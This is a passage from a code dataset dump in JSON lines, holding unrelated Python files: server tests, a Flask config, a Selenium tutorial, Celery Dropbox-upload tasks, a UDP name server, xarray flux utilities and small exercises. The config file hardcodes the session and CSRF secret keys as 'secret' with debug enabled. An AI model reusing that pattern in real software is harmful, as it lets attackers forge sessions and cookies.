_gen_test_data_bundle(tasklet_server, registered_schema)\n\n grpc_stub = tasklet_server.grpc_stub\n req = tasklet_service_pb2.ExecuteRequest(\n namespace=namespace.name,\n tasklet=tasklet.Name,\n label=label.Name,\n input=data_model_pb2.ExecutionInput(\n serialized_data=typed_input.SerializeToString(),\n )\n )\n\n resp: tasklet_service_pb2.ExecuteResponse = grpc_stub.Execute(req)\n execution_id = resp.execution.meta.id\n\n get_req = tasklet_service_pb2.GetExecutionRequest(id=execution_id)\n get_resp: tasklet_service_pb2.GetExecutionResponse = grpc_stub.GetExecution(get_req)\n\n assert _execution_to_json(resp.execution) == _execution_to_json(get_resp.execution)\n\n\ndef test_third_party_input_in_execution_json(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace, tasklet, build, label, typed_input = _gen_test_data_bundle(tasklet_server, registered_schema)\n execution_json = _run_execution(tasklet_server, tasklet, build, label, typed_input)\n\n # GET execution\n rv = requests.get(\n f\"{tasklet_server.api}/executions:getById\", params={\"id\": execution_json['meta']['id']},\n )\n test_utils.ensure_response_status(rv)\n execution_json[\"status\"].setdefault(\"result\", {})\n assert _format_execution_json(rv.json()[\"execution\"]) == _format_execution_json(execution_json)\n\n\ndef test_list_executions_pagination(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespaces = [tasklet_server.create_ns(f\"ns{x}\") for x in range(2)]\n tasklet_to_builds: dict[test_models.Tasklet, typing.List[test_models.Build]] = {}\n build_to_labels: dict[test_models.Build, test_models.Label] = {}\n\n for ns in namespaces:\n ns_tasklets = [tasklet_server.create_tasklet(ns, f\"TL_t{x}\", {}) for x in range(2)]\n for tl in ns_tasklets:\n builds = [tasklet_server.create_build(tl, registered_schema, None) for _ in range(2)]\n for build in builds:\n assert build not in build_to_labels\n build_to_labels[build] = tasklet_server.create_label(tl, f\"build-{build.ID[-5:]}\", build, {})\n assert tl not in tasklet_to_builds\n tasklet_to_builds[tl] = builds\n\n execution_to_parents: typing.Dict[str, typing.Tuple[test_models.Tasklet, test_models.Build]] = {}\n build_to_executions: typing.Dict[test_models.Build, typing.Set[str]] = {}\n step = 0\n total_execution_count = 0\n\n input_message = well_known_structures_pb2.GenericBinary(payload=b\"foo-bar-baz\")\n\n def spawn_executions(count, tl_: test_models.Tasklet, build_: test_models.Build):\n for _ in range(count):\n execution_id = tasklet_server.create_execution(\n tl_,\n build_to_labels[build_],\n input_message,\n )\n assert execution_id not in execution_to_parents\n execution_to_parents[execution_id] = (tl_, build_)\n assert execution_id not in build_to_executions[build_]\n build_to_executions[build_].add(execution_id)\n\n for tl, builds in tasklet_to_builds.items():\n for build in builds:\n assert build not in build_to_executions\n build_to_executions[build] = set()\n total_execution_count += 10 + step\n assert total_execution_count < 1000\n spawn_executions(10 + step, tl, build)\n\n # List executions by build\n for tl, builds in tasklet_to_builds.items():\n for build in builds:\n this_build_executions = set()\n token = None\n while True:\n rv = requests.get(\n f\"{tasklet_server.api}/executions:listByBuild\",\n params={\"token\": token, \"build_id\": build.ID}\n )\n test_utils.ensure_response_status(rv)\n token = rv.json()[\"token\"]\n if not rv.json().get(\"executions\", []):\n break\n for execution in 
rv.json()[\"executions\"]:\n assert execution[\"meta\"][\"tasklet_id\"] == build.TaskletID\n assert execution[\"meta\"][\"build_id\"] == build.ID\n assert execution[\"meta\"][\"id\"] not in this_build_executions\n this_build_executions.add(execution[\"meta\"][\"id\"])\n\n assert this_build_executions == build_to_executions[build]\n\n # List executions by build\n for tl, builds in tasklet_to_builds.items():\n this_tasklet_executions = set()\n token = None\n while True:\n rv = requests.get(\n f\"{tasklet_server.api}/executions:listByTasklet\",\n params={\n \"namespace\": tl.NS,\n \"tasklet\": tl.Name,\n \"token\": token,\n },\n )\n test_utils.ensure_response_status(rv)\n token = rv.json()[\"token\"]\n if not rv.json().get(\"executions\", []):\n break\n for execution in rv.json()[\"executions\"]:\n assert execution[\"meta\"][\"tasklet_id\"] == tl.ID\n assert execution[\"meta\"][\"tasklet_id\"] == execution_to_parents[execution[\"meta\"][\"id\"]][0].ID\n assert execution[\"meta\"][\"build_id\"] == execution_to_parents[execution[\"meta\"][\"id\"]][1].ID\n assert execution[\"meta\"][\"id\"] not in this_tasklet_executions\n this_tasklet_executions.add(execution[\"meta\"][\"id\"])\n\n assert this_tasklet_executions == \\\n set(execution_id for execution_id, parents in execution_to_parents.items() if tl == parents[0])\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Tasklet/experimental/tests/test_executions.py","file_name":"test_executions.py","file_ext":"py","file_size_in_byte":15465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12585523501","text":"import os\n\n\n# Statement for enabling the development environment\nDEBUG = True\nASSETS_DEBUG = True\n\n# Define the application directory\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n# Define the database - we are working with\n# SQLite for this example\nSQLALCHEMY_DATABASE_URI = 'sqlite:///./app.db'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nDATABASE_CONNECT_OPTIONS = {}\n\n# Enable protection against *Cross-site Request Forgery (CSRF)*\nCSRF_ENABLED = True\n\n# Use a secure, unique and absolutely secret key for\n# signing the data.\nCSRF_SESSION_KEY = \"secret\"\n\n# Secret key for signing cookies\nSECRET_KEY = \"secret\"\n","repo_name":"THSUPRM/ths-client","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41421371156","text":"import os\nimport sys\nimport re\nimport glob\nimport unittest\n\ntest_basedir = 'test'\ntest_subdirs = ['sbml','xml','math','annotation']\ntest_files = \"/Test*.py\"\n\ndef suite():\n suite = unittest.TestSuite()\n cwd = os.getcwd() \n sys.path.append(cwd)\n os.chdir(test_basedir + '/..')\n for subdir in test_subdirs :\n sys.path.append(test_basedir + '/' + subdir)\n for file in glob.glob( test_basedir + '/' + subdir + '/' + test_files ) :\n module_name = re.compile(r\"\\.py$\").sub('',os.path.basename(file)) \n module = __import__(module_name)\n class_name = getattr(module, module_name)\n suite.addTest(unittest.makeSuite(class_name))\n return suite\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1: \n # parse additional command line arguments\n for index in range(1, len(sys.argv)):\n current = sys.argv[index]\n hasNext = (index + 1) < len(sys.argv)\n nextIndex = (index + 1);\n if current == \"-b\" and hasNext:\n # allow to set the base path\n test_basedir = sys.argv[nextIndex];\n 
index = nextIndex\n            elif current == \"-p\" and hasNext:\n                # add directory to path\n                sys.path.append(sys.argv[nextIndex])\n                index = nextIndex\n            elif current == \"-a\" and hasNext:\n                # allow to test additional directories\n                test_subdirs = test_subdirs + sys.argv[nextIndex:]\n                break;\n    if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :\n        sys.exit(0)\n    else:\n        sys.exit(1)\n\n","repo_name":"sbmlteam/libsbml","sub_path":"src/bindings/python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"} +{"seq_id":"3229307906","text":"# -*- coding: utf-8 -*-\n# VIDEO - 4/45 Selenium with Python Tutorial 4-WebDriver Navigational Commands\n'''\nAGENDA\nNavigation commands\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndriver = webdriver.Firefox()\n\ndriver.get(\"http://newtours.demoaut.com/\")\n\nprint(driver.title)\n\ndriver.get(\"http://pavantestingtools.blogspot.in/\")\n\ntime.sleep(5)\n\nprint(driver.title)\n\n# go back to the previous page\ndriver.back()\n\nprint(driver.title)\n\n# go forward to the next page\ndriver.forward()\n\nprint(driver.title)\n\ndriver.close()","repo_name":"leandroaa7/selenium","sub_path":"sdet-selenium-with-python/navigationcommands.py","file_name":"navigationcommands.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34148910513","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.1'\n\nsetup(name='curtocircuito',\n      version=version,\n      description=\"Social network for sharing electronic circuit\",\n      long_description=open(\"README.txt\").read() + \"\\n\" +\n                       open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n      # Get more strings from http://www.python.org/pypi?%3Aaction=list_classifiers\n      classifiers=[\n        \"Programming Language :: Python\",\n        \"Topic :: Software Development :: Libraries :: Python Modules\",\n        ],\n      keywords='',\n      author='Luciano Pacheco',\n      author_email='lucmult@gmail.com',\n      url='http://github.com/lucmult/curtocircuito',\n      license='GPL',\n      packages=find_packages(exclude=['ez_setup']),\n      namespace_packages=[],\n      include_package_data=True,\n      zip_safe=False,\n      install_requires=[\n          'setuptools',\n          # -*- Extra requirements: -*-\n      ],\n      entry_points=\"\"\"\n      # -*- Entry points: -*-\n      \"\"\",\n      )\n","repo_name":"lucmult/cc-buildout","sub_path":"src/curtocircuito/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"18332530961","text":"import sys\nimport math\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef make_grid(h, w, num): return [[int(num)] * w for _ in range(h)]\n\n\ndef main():\n    N = NI()\n    edges = [[i]+NLI() for i in range(N-1)]\n    C = NLI()\n    tree = [[] for _ in range(N+1)]\n    for edge in edges:\n        tree[edge[1]].append(edge[2])\n        tree[edge[2]].append(edge[1])\n    option_nums = []\n    for i, node in enumerate(tree):\n        option = len(node)\n        option_nums.append([option, i])\n    option_nums = sorted(option_nums)\n    C = sorted(C)\n    ans = {}\n    for op, c in zip(option_nums[1:], C):\n        ans[op[1]] = c\n    A = 0\n    for edge in edges:\n        x, y = edge[1], edge[2]\n        A += min(ans[x], ans[y])\n    print(A)\n    for i in range(1, N+1):\n        if i == N:\n            print(str(ans[i]))\n            continue\n        print(str(ans[i]), end=\" \")\n\nif __name__ == \"__main__\":\n    main()","repo_name":"Mao-beta/AtCoder","sub_path":"M-SOLUTIONS2019D.py","file_name":"M-SOLUTIONS2019D.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31461097480","text":"#!/usr/bin/python\nfrom __future__ import absolute_import\nfrom celery import app, Celery\nfrom .models import dropbox_space_limit_event, dropbox_motion_video_event\nfrom .models import new_motion_detected_event, remove_motion_video_url\nfrom .models import dropbox_upload_error_event\nfrom django.conf import settings\nimport os\nimport subprocess\n\napp = Celery('celerytasks', broker='amqp://guest:guest@localhost:5672//')\n\nDROPBOX_FREE_THRESH_MB = 100\nCAPACITY_THRESH_MB = 10\nMB_IN_BYTES = 1048576.0\n\ndropbox_videos = \"/videos\"\ndropbox_images = \"/images\"\n\ndef is_motion_dir_full(motion_path):\n    os.chdir(motion_path)\n    curr_size = sum(os.path.getsize(f) for f in os.listdir('.')\n                    if os.path.isfile(f))\n    curr_size_mb = curr_size / MB_IN_BYTES\n    return (curr_size_mb > CAPACITY_THRESH_MB)\n\n@app.task\ndef alert_if_dropbox_full():\n    # get dropbox account info\n    proc = subprocess.Popen([settings.DROPBOX_UPLOADER,'info'],\n                            stdout=subprocess.PIPE)\n    output_lines = proc.stdout.read().split('\\n')\n    data = dict()\n    for pair in (x.split(':\\t') for x in output_lines if ':\\t' in x):\n        data[pair[0]] = pair[1]\n\n    # check free space\n    free_space = int(data['Free'].split()[0])\n    if free_space < DROPBOX_FREE_THRESH_MB:\n        # write warning event to web app\n        dropbox_space_limit_event(free_space)\n    return free_space\n\n@app.task\ndef upload_motion_to_dropbox():\n    motion_path = settings.MOTION_TARGET_DIR\n\n    if not is_motion_dir_full(motion_path):\n        pass\n\n    video_files = os.path.join(motion_path, \"*.avi\")\n    image_files = os.path.join(motion_path, \"*.jpg\")\n\n    # upload videos to dropbox\n    proc = subprocess.Popen([settings.DROPBOX_UPLOADER, 'upload'] +\n                            filter(\n                                lambda f:f.endswith('avi'),\n                                os.listdir(motion_path)) +\n                            [dropbox_videos],\n                            stdout=subprocess.PIPE)\n    # get new remote videos and add events to web app\n    # assuming output line format: > Uploading \"local_path\" to \"remote_path\"... DONE\n    files = proc.stdout.read().split('\\n')\n    for item in (f.split('\"') for f in files if 'DONE' in f):\n        remote_file = item[3]\n        proc = subprocess.Popen([settings.DROPBOX_UPLOADER, 'share',\n                                remote_file], stdout=subprocess.PIPE)\n        # assuming output format: > Share link: https://db.tt/a9xJoX9X\n        shared_url = proc.stdout.read().split()[3]\n        # create event for new motion video\n        dropbox_motion_video_event(shared_url)\n\n    # delete videos from Rpi\n    os.system(\"rm -f \" + os.path.join(motion_path, \"*.avi\"))\n\n    # upload images to dropbox and delete from Rpi\n    #os.system(settings.DROPBOX_UPLOADER + \" upload \" + image_files + \" \" + dropbox_images)\n    #os.system(\"rm -f \" + os.path.join(motion_path, \"*.jpg\"))\n\n    alert_if_dropbox_full()
\n\n@app.task\ndef new_motion_detected(filepath):\n    if not os.path.isfile(filepath):\n        return\n\n    # Add event to let web app users know motion was detected\n    event_id = new_motion_detected_event(os.path.basename(filepath))\n\n    # Upload motion video to Dropbox\n    proc = subprocess.Popen([settings.DROPBOX_UPLOADER, 'upload',\n                            filepath, dropbox_videos],\n                            stdout=subprocess.PIPE)\n\n    # Get remote video URL and add event to web app,\n    # assuming output line format: > Uploading \"local_path\" to \"remote_path\"... DONE\n    output = proc.stdout.read()\n    if 'DONE' not in output:\n        # There was an error while uploading the video to Dropbox, abort.\n        dropbox_upload_error_event()\n        return\n    remote_file = output.split('\"')[3]\n    proc = subprocess.Popen([settings.DROPBOX_UPLOADER, 'share', remote_file],\n                            stdout=subprocess.PIPE)\n    # assuming output format: > Share link: https://db.tt/a9xJoX9X\n    shared_url = proc.stdout.read().split()[3]\n\n    # Create event for new motion video\n    dropbox_motion_video_event(shared_url)\n\n    # Remove option to download local video because it's about to be deleted\n    remove_motion_video_url(event_id)\n\n    # delete video from motion data directory\n    os.remove(filepath)\n","repo_name":"amito/rpi-surv-cam","sub_path":"rpisurvcam/events/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71699743761","text":"import web_utils.connection as connection\nfrom rpc.servers_list import OPERATION_SERVERS\nimport json\n\nNAME_SERVER_STD_IP = \"127.0.0.1\"\nNAME_SERVER_STD_PORT = 15000\n\nNAME_SERVER_STD_ADDR = (NAME_SERVER_STD_IP, NAME_SERVER_STD_PORT)\n\nclass NameServer:\n    def __init__(self, ip: str = NAME_SERVER_STD_IP, port: int = NAME_SERVER_STD_PORT):\n        \"\"\"\n        Initializes a name server with the given IP address and port number.\n\n        :param port: Port number of the server.\n        \"\"\"\n        self.ip = ip\n        self.port = port\n        self.server_socket = None\n        self.operation_servers = OPERATION_SERVERS\n\n    def __del__(self):\n        \"\"\"\n        Closes the server socket when the object is destroyed.\n        \"\"\"\n        if self.server_socket: \n            self.server_socket.close()
\n\n\n    def start(self) -> None:\n        \"\"\"\n        Starts the name server and waits for client connections.\n        \"\"\"\n        self.server_socket = connection.create_server_connection(self.ip, self.port, False)\n        print(f\"O servidor de nomes está ouvindo na porta {self.port}...\")\n        \n        try:\n            while True:\n                operation, address = connection.receive_udp_socket_message(self.server_socket)\n                print(address)\n                server_list = [server for server, operations in self.operation_servers.items() if operation.decode() in operations]\n                connection.send_udp_socket_message(self.server_socket, json.dumps(server_list), address)\n        except KeyboardInterrupt:\n            print(\"\\nO servidor foi finalizado...\")\n        finally:\n            self.server_socket.close()
\n\n\n    def close(self) -> None:\n        \"\"\"\n        Closes the server socket when the object is closed.\n        \"\"\"\n        if self.server_socket: \n            self.server_socket.close()","repo_name":"ViniciusJPSilva/TSI-RemoteProcedureCall","sub_path":"rpc/name_server.py","file_name":"name_server.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36301117640","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 24 16:50:07 2020\n\n@author: ntr002\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport os\nfrom . import GIS_functions as gis\n\ndef open_nc(input_nc, chunksize=None, layer=None):\n    if chunksize is None:\n        dts=xr.open_dataset(input_nc)\n    else:\n        dts=xr.open_dataset(input_nc,\n                            chunks={'time':chunksize[0],\n                                    'longitude':chunksize[1],\n                                    'latitude':chunksize[2]})\n    if type(layer) is int: #select dataarray by index\n        layer_name=list(dts.keys())[layer]\n        return dts[layer_name]\n    elif type(layer) is str: #select dataarray by name\n        return dts[layer]\n    else:\n        return dts
\n    \ndef create_yearly_dataset(monthly_nc, output=None, \n                          hydroyear='A-DEC',chunksize=None):\n    '''\n    create yearly dataset from monthly dataset\n    monthly_nc: str \n        path to monthly NetCDF file\n    output: str \n        path to output yearly NetCDF file\n    hydroyear: str \n        End month of hydrological year. default is 'A-DEC' for December\n    chunksize: list of 3 int\n        time chunk, x and y chunks\n        default is None, meaning chunks are not used\n    '''\n    #check output path\n    if output is None:\n        if monthly_nc[-10:] == 'monthly.nc':\n            output=monthly_nc.replace('monthly.nc','yearly.nc')\n        else:\n            output=monthly_nc.replace('.nc','_yearly.nc')\n    else:\n        if not os.path.exists(os.path.dirname(output)):\n            os.makedirs(os.path.dirname(output))\n    #open monthly nc\n    dts=open_nc(monthly_nc, chunksize=chunksize)\n    #resample to hydrological years\n    dts_y=dts.resample(time=hydroyear).sum(dim=['time'],skipna=False)\n    dts_y.to_netcdf(output)\n    \n    #close netcdf file\n    dts.close()\n    dts_y.close()\n    \n    return output
\n\ndef resample_to_monthly_dataset(yearly_nc, sample_nc,\n                                start_month=0,\n                                output=None,\n                                chunksize=None):\n    '''\n    yearly_nc: a yearly dataset to resample to monthly\n    sample_nc: a monthly dataset to sample 'time' dimension\n    start_month: the index of start month. 
\n default start_month = 0 means yearly value resample from the first\n month in sample_nc\n \n Resample a yearly netCDF dataset to monthly netCDF dataset\n Where the value of each month is the same with the value of the year\n '''\n dts1=open_nc(yearly_nc,chunksize=chunksize,layer=0)\n dts2=open_nc(sample_nc,chunksize=chunksize,layer=0) \n \n for i in range(len(dts1.time)):\n for t in range(i*12-start_month,i*12+12-start_month):\n LU=dts1.isel(time=i)\n if t==0:\n dts=LU\n else:\n dts = xr.concat([dts, LU], dim='time') \n dts['time']=dts2['time']\n #change coordinates order to [time,latitude,longitude]\n dts=dts.transpose('time','latitude','longitude') \n\n dts.attrs=dts1.attrs\n dts.name = dts1.name\n \n comp = dict(zlib=True, \n complevel=9, \n least_significant_digit=2, \n chunksizes=chunksize)\n if output is None:\n output=yearly_nc.replace('.nc','_resampled_monthly.nc')\n encoding = {dts.name: comp}\n dts.load().to_netcdf(output,encoding=encoding)\n dts1.close()\n dts2.close()\n print('Save monthly LU datacube as {0}'.format(output))\n return output\n\ndef calc_flux_per_basin(dts_nc, basin_mask, \n chunksize=None,output=None,quantity='volume'):\n '''\n calculate flux per basin/sub-basin\n input_nc: str\n path to dataset (NetCDF) (in mm)\n basin_mask: str OR np.array/xr.DataArray\n str \n path to basin mask (GeoTIFF)\n np.array/xr.DataArray \n pixel area of basin (in km2)\n or mask of basin\n quantity: str\n 'volume' OR 'depth'\n \n output: str\n path to output (csv)\n default is None \n \n return\n dataframe (in TCM)\n '''\n dts=open_nc(dts_nc,chunksize=chunksize)\n #read area mask\n if type(basin_mask) is str:\n basin=gis.OpenAsArray(basin_mask,nan_values=True)\n area_map=gis.MapPixelAreakm(basin_mask)\n area_mask=area_map*basin\n else: #basin_mask is 2D array\n area_mask=basin_mask\n #calculate flux \n if quantity=='volume':\n dts_m=dts*area_mask #flux = depth*area \n df=dts_m.sum(dim=['latitude','longitude']).to_dataframe() #export data\n elif quantity=='depth':\n dts_m=dts*basin_mask\n df=dts_m.mean(dim=['latitude','longitude']).to_dataframe() #export data\n if output is not None:\n df.to_csv(output,sep=';') #save data as csv\n print('Save basin flux as {0}'.format(output))\n dts.close()\n return df\n\n\ndef calc_flux_per_LU_class(dts_nc, lu_nc, basin_mask,\n chunksize=None, \n output=None, \n lu_dictionary=None, \n quantity='volume'):\n '''\n calculate flux per LU class in WA+ LU map\n \n input_nc: str\n path to yearly dataset (NetCDF) (in mm)\n lu_nc: str\n path to NetCDF of LULC map\n \n basin_mask: str OR np.array/xr.DataArray\n str \n path to basin mask (GeoTIFF)\n np.array/xr.DataArray \n pixel area of basin (in km2)\n chunksize: list\n [t,x,y] chunksize of datacube\n output: str\n path to output (csv)\n default is None \n quantity: str\n 'volume': multiplied with pixel area (km2). 
\n if variable unit is mm, \n the result will be in 10^3 m3 or 10^-6 km3\n if the variable unit is kg/ha,\n the result will be in 10^2 kg\n 'depth': keep the variable unit\n \n return\n dataframe (in TCM)\n '''\n dts=open_nc(dts_nc,chunksize=chunksize)\n lu=open_nc(lu_nc,chunksize=chunksize,layer=0)\n \n #read basin mask\n if type(basin_mask) is str:\n basin=gis.OpenAsArray(basin_mask,nan_values=True)\n \n if quantity=='volume':\n #get area mask\n if type(basin_mask) is str:\n area_map=gis.MapPixelAreakm(basin_mask)\n area_mask=area_map*basin\n else:\n area_mask=basin_mask \n dts_m=dts*area_mask #flux = depth*area\n method='sum'\n \n elif quantity=='depth':\n dts_m=dts*basin\n method='mean'\n \n# n_lu=len(lu.time) #number of landuse map\n \n# if n_lu==1: #single landuse map\n# LU=lu[0] #get single landuse map \n \n if lu_dictionary is None:\n df=aggregate_by_lu_unique(dts_m,lu,how=method)\n elif type(lu_dictionary) is dict:\n df=aggregate_by_lu_dictionary(dts_m,lu,lu_dictionary,\n how=method)\n \n if output is not None: #export result if output path is defined\n df.to_csv(output,sep=';')\n print('Save LU flux as {0}'.format(output))\n lu.close()\n dts.close()\n return df\n\ndef aggregate_by_lu_unique(dts,LU,how='sum'):\n '''aggregate dataset by unique LU classes in LU map(s)\n '''\n unique_LU=np.unique(LU) #get unique landuse classes\n unique_LU=unique_LU[~np.isnan(unique_LU)] #exclude nan\n data=[] #create empty data list\n \n LU=dts*0+LU #Trick: to keep same time dimension\n dts=LU*0+dts #Trick: to keep same time dimension\n for lucl in unique_LU: #agrregate total fluxes per each lu class\n dts_lu=xr.where(LU==lucl,dts,np.nan) #mask only lu class\n if how=='sum':\n df_lu=dts_lu.sum(dim=[\n 'latitude',\n 'longitude'\n ]).to_dataframe() #sum of all pixels in lu class\n elif how=='mean':\n df_lu=dts_lu.mean(dim=[\n 'latitude',\n 'longitude'\n ]).to_dataframe() #mean of all pixels in lu class \n if len(df_lu.columns)>1: \n df_lu.columns=['{0}-{1}'.format(lucl,\n col) for col in df_lu.columns] #rename column with variable \n else:\n df_lu.columns=['{0}'.format(lucl) for col in df_lu.columns] #rename column \n data.append(df_lu) #append data list by lu class\n df=pd.concat(data, axis=1) #merge all results into 1 dataframe\n return df\n\ndef aggregate_by_lu_dictionary(dts,LU,lu_dictionary,how='sum'):\n '''aggregate dataset by LU classes categories \n '''\n data=[] #create empty data list\n LU=dts*0+LU #Trick: to keep same time dimension\n dts=LU*0+dts #Trick: to keep same time dimension\n for key in lu_dictionary: #agrregate total fluxes per each lu class\n classes=lu_dictionary[key]\n dts_lu=xr.where(LU.isin(classes),dts,np.nan) #mask only lu class\n if how=='sum':\n df_lu=dts_lu.sum(dim=[\n 'latitude',\n 'longitude'\n ]).to_dataframe() #sum of all pixels in lu class\n elif how=='mean':\n df_lu=dts_lu.mean(dim=[\n 'latitude',\n 'longitude'\n ]).to_dataframe() #mean of all pixels in lu class \n if len(df_lu.columns)>1: \n df_lu.columns=['{0}-{1}'.format(key,\n col) for col in df_lu.columns] #rename column with variable \n else:\n df_lu.columns=['{0}'.format(key) for col in df_lu.columns] #rename column \n data.append(df_lu) #append data list by lu class\n df=pd.concat(data, axis=1) #merge all results into 1 dataframe\n return df\n\n","repo_name":"trngbich/Hydroloop","sub_path":"WAsheets/calculate_flux.py","file_name":"calculate_flux.py","file_ext":"py","file_size_in_byte":9789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
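# --- Editorial example (hedged; not part of the original dataset) ---
# A minimal sketch of the per-class aggregation trick used in
# calculate_flux.py above: xr.where() keeps the pixels of one land-use
# class and turns the rest into NaN, then the reduction runs over the
# spatial dimensions only. The toy arrays, coordinates and class codes
# below are illustrative assumptions, not values from that module.
import numpy as np
import xarray as xr

flux = xr.DataArray(np.ones((2, 2, 2)),
                    coords=[[0, 1], [0.0, 1.0], [0.0, 1.0]],
                    dims=['time', 'latitude', 'longitude'])
lu = xr.DataArray([[1, 2], [2, 2]],
                  coords=[[0.0, 1.0], [0.0, 1.0]],
                  dims=['latitude', 'longitude'])

for lucl in np.unique(lu):
    masked = xr.where(lu == lucl, flux, np.nan)         # keep one LU class only
    totals = masked.sum(dim=['latitude', 'longitude'])  # total flux per time step
    print(int(lucl), totals.values)                     # 1 -> [1. 1.], 2 -> [3. 3.]
# When the datacube is opened with chunks (see open_nc above), the same
# reductions run lazily on dask-backed arrays, which is presumably why the
# module threads a chunksize argument through every function.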
+{"seq_id":"3061312109","text":"from random import randint\nfrom time import sleep\n\n\n# итератор\n# mylist1 = [1, 2, 3]\n# for i in mylist1:\n# print(i)\n\n# mylist2 = [x * x for x in range(3)]\n# for i in mylist2:\n # print(mylist2) #напечатает трижды [0, 1, 4]\n\n\n# генератор\n# mygenerator = (x*x for x in range(3))\n# for i in mygenerator:\n# print(i) # выведет 0 1 4\n\n\n#бесконечный генератор случайных чисел с условием 14.02\ndef create_generator(a, b, c) :\n while True:\n yield randint(a, b)\n a += c\n b += c\n sleep(1)\n\n# if __name__ == '__main__':\n#\n# for i in create_generator(0, 4, 2):\n# print(i)\n\n\n\n#№2\ndef create_generator():\n yield 1\n yield 2\n yield 3\n\n\n# if __name__ == '__main__':\n# # \n# gen = create_generator()\n# print(f'{next(gen)}!')\n# print(f'{next(gen)}@')\n\n\n# выведет: корова, кот, собака, медведь, кит\n# def my_animal_generator():\n# yield 'корова'\n# for animal in ['кот', 'собака', 'медведь']:\n# yield animal\n# yield 'кит'\n#\n# my_generator = my_animal_generator()\n# print(next(my_generator))\n# for animal in my_generator:\n # print(animal)","repo_name":"KarinaYatskevich/python","sub_path":"Lesson/Lessons/yield.py","file_name":"yield.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32586614844","text":"import json\nimport mysql.connector\nimport sensitive\nimport mdc2unicode\n\n# load transliterations from csv into dictionary dictTranslit\ntranslitcsv=r\"D:\\hieraProject\\P1_hieratable\\IntermediateData\\hierogtranslit.csv\"\nftranslit=open(translitcsv,encoding='utf-8-sig')\ntranslitrows=(line.split('\\t') for line in ftranslit)\ndictTranslit={}\nfor r in translitrows:\n sMultipleTranslits=r[1][0:-1]\n if sMultipleTranslits==\"-\":\n sMultipleTranslits=\"\"\n if sMultipleTranslits!=\"\":\n dictTranslit[r[0]]=[]\n for sTranslit in sMultipleTranslits.split(\",\"):\n dictTranslit[r[0]].append({'ascii':mdc2unicode.unicode2mdc(sTranslit),'unicode':sTranslit})\nftranslit.close()\n\n\n#connect to database\nhieradb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=sensitive.mysqlPassword,\n database=\"hiera\"\n)\n\nfor k,v in dictTranslit.items():\n jsonDump=json.dumps(dictTranslit[k])\n print(jsonDump)\n c = hieradb.cursor()\n sql = \"UPDATE signsandgroups SET transliterations = %s WHERE mdc = %s\"\n val = (jsonDump,k)\n c.execute(sql, val)\n hieradb.commit()\n","repo_name":"PhilHen/nkhp","sub_path":"code/storeTransliterationsInSignsAndGroupsFromCSV.py","file_name":"storeTransliterationsInSignsAndGroupsFromCSV.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20092463299","text":"import bpy\n\nclass rmKitPannel_parent( bpy.types.Panel ):\n\tbl_idname = \"VIEW3D_PT_RMKIT_PARENT\"\n\tbl_label = \"rmKit\"\n\tbl_space_type = \"VIEW_3D\"\n\tbl_region_type = \"UI\"\n\tbl_category = \"rmKit\"\n\n\tdef draw( self, context ):\n\t\tlayout = self.layout\n\nclass rmKitPannel_parent_uv( bpy.types.Panel ):\n\tbl_idname = \"UV_PT_RMKIT_PARENT\"\n\tbl_label = \"rmKit\"\n\tbl_space_type = \"IMAGE_EDITOR\"\n\tbl_region_type = \"UI\"\n\tbl_category = \"rmKit\"\n\n\tdef draw( self, context ):\n\t\tlayout = self.layout\n\nfrom . import polypatch\nfrom . import reduce\nfrom . import context_bevel\nfrom . import loopring\nfrom . import move_to_furthest\nfrom . import knifescreen\nfrom . import connect_edges\nfrom . import arcadjust\nfrom . 
